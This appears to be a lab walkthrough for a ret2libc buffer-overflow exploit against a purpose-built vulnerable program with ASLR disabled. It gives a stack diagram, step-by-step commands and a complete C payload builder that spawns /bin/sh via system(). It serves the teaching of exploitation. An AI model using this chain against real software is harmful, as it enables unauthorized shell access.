This is based on ; the Makefile automates most of the steps below. It has been tested on Debian 10.3 running kernel 4.19.0-8-amd64 with gcc (Debian 8.3.0-6) 8.3.0.

All addresses below assume ASLR is disabled for the victim, which is what `setarch $(arch) -R` does. The stack address of the buffer also depends on the environment variables and arguments the victim is started with, so start it the same way, from the same shell, in every step.

1. Compile and run the victim code

       make victim
       setarch $(arch) -R ./victim

2. Grab the address where the buffer (name[]) is located on the stack, for example from gdb, and update the Makefile if necessary.

3. Run the victim the same way and use pmap to find the base address of the libc text segment; update the Makefile if necessary

       setarch $(arch) -R ./victim &
       pmap $(pgrep victim)

4. Create the attack input

       make attack.bin

   The input overflows name[64], overwrites the saved rbp and the return address, and leaves a two-step chain above them: the return address points at a `pop %rdi; retq` gadget, which loads the address of the "/bin/sh" string sitting at the start of name[] into %rdi and then returns into system(). Highest address is at the top; the right-hand columns are the little-endian bytes of each 8-byte slot:

   0x00007fffffffe428 |                | c059 e6f7 ff7f 0000 ------> (system() in libc)
   0x00007fffffffe420 |                | d0e3 ffff ff7f 0000 ---+
                      +----------------+                        |
   0x00007fffffffe418 | return address | 5f4a e4f7 ff7f 0000 ---|--> (pop %rdi; retq)
                      |----------------|                        |
   0x00007fffffffe410 | saved rbp      | 0000 0000 0000 0000    |
                      |----------------|                        |
   0x00007fffffffe408 |                | 0000 0000 0000 0000    |
   0x00007fffffffe400 |                | 0000 0000 0000 0000    |
   0x00007fffffffe3f8 |                | 0000 0000 0000 0000    |
   0x00007fffffffe3f0 |                | 0000 0000 0000 0000    |
   0x00007fffffffe3e8 | char name[64]  | 0000 0000 0000 0000    |
   0x00007fffffffe3e0 |                | 0000 0000 0000 0000    |
   0x00007fffffffe3d8 |                | 0000 0000 0000 0000    |
   0x00007fffffffe3d0 |                | 2f62 696e 2f73 6800 <--+
                      |----------------|

5. Run the attack

       make attack

   If the victim instead dies with SIGSEGV on a movaps instruction inside system(), the stack is not 16-byte aligned at the call; the usual fix is to put one extra `retq` gadget in front of the `pop %rdi; retq` address so the rest of the chain shifts by 8 bytes.
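As an added example (this is not the repository's Makefile or its victim source), the following C program builds attack.bin with exactly the layout of the diagram above from three addresses: the start of name[], the `pop %rdi; retq` gadget and system(). The addresses used in the test are the ones decoded from the diagram's bytes (0x00007fffffffe3d0, 0x00007ffff7e44a5f and 0x00007ffff7e659c0) and are only meaningful for that machine with ASLR disabled; the function names are this example's own. The newline check in payload_ok() is an assumption: it only matters if the victim reads its input with gets()/fgets(), which the page does not say.

```c
/* build_payload.c: added example, not the repository's Makefile.
 * Lays out the ret2libc chain from the stack diagram:
 *   name[0..7]    "/bin/sh\0"  string that system() will run
 *   name[8..63]   zero padding
 *   saved rbp     8 bytes, value irrelevant
 *   return addr   pop %rdi; retq gadget
 *   next qword    address of name[] (popped into %rdi)
 *   next qword    system() in libc
 * Build: gcc -o build_payload build_payload.c
 * Usage: ./build_payload <name_addr> <pop_rdi_ret> <system> > attack.bin
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN    64
#define PAYLOAD_LEN (NAME_LEN + 8 + 8 + 8 + 8)   /* 96 bytes */

/* Store a 64-bit value little-endian, as the x86-64 stack holds it. */
static void put_u64(uint8_t *dst, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        dst[i] = (uint8_t)(v >> (8 * i));
}

static uint64_t get_u64(const uint8_t *src)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)src[i] << (8 * i);
    return v;
}

/* Write the payload into out[PAYLOAD_LEN]; returns its length. */
size_t build_payload(uint8_t *out, uint64_t name_addr,
                     uint64_t pop_rdi_ret, uint64_t system_addr)
{
    memset(out, 0, PAYLOAD_LEN);
    memcpy(out, "/bin/sh", 8);                  /* 8 bytes incl. NUL */
    put_u64(out + NAME_LEN + 8,  pop_rdi_ret);  /* replaces return address */
    put_u64(out + NAME_LEN + 16, name_addr);    /* -> %rdi = "/bin/sh" */
    put_u64(out + NAME_LEN + 24, system_addr);  /* gadget's retq lands here */
    return PAYLOAD_LEN;
}

/* Pre-flight checks: the %rdi slot must point at the start of name[], and
 * (assumption: only relevant if the victim reads with gets()/fgets()) no
 * address byte may be '\n', or the read stops early and truncates the chain. */
int payload_ok(const uint8_t *p, size_t len, uint64_t name_addr)
{
    if (len != PAYLOAD_LEN || memcmp(p, "/bin/sh", 8) != 0)
        return 0;
    if (get_u64(p + NAME_LEN + 16) != name_addr)
        return 0;
    for (size_t i = NAME_LEN + 8; i < PAYLOAD_LEN; i++)
        if (p[i] == '\n')
            return 0;
    return 1;
}

/* Byte at offset off of the payload built from these addresses,
 * or -1 if off is out of range. */
int payload_byte(uint64_t name_addr, uint64_t pop_rdi_ret,
                 uint64_t system_addr, size_t off)
{
    uint8_t pl[PAYLOAD_LEN];
    size_t n = build_payload(pl, name_addr, pop_rdi_ret, system_addr);
    return off < n ? pl[off] : -1;
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <name_addr> <pop_rdi_ret> <system> > attack.bin\n",
                argv[0]);
        return 1;
    }
    uint64_t name_addr = strtoull(argv[1], NULL, 16);
    uint64_t gadget    = strtoull(argv[2], NULL, 16);
    uint64_t sys_addr  = strtoull(argv[3], NULL, 16);
    uint8_t pl[PAYLOAD_LEN];
    size_t n = build_payload(pl, name_addr, gadget, sys_addr);
    if (!payload_ok(pl, n, name_addr)) {
        fprintf(stderr, "payload failed pre-flight checks\n");
        return 1;
    }
    return fwrite(pl, 1, n, stdout) == n ? 0 : 1;
}
```

Feeding the result to the victim is the same as `make attack`; the point of payload_ok() is that a wrong name[] address (a different environment, or ASLR left on) or an address containing a line-feed byte is caught before the crash rather than diagnosed from it.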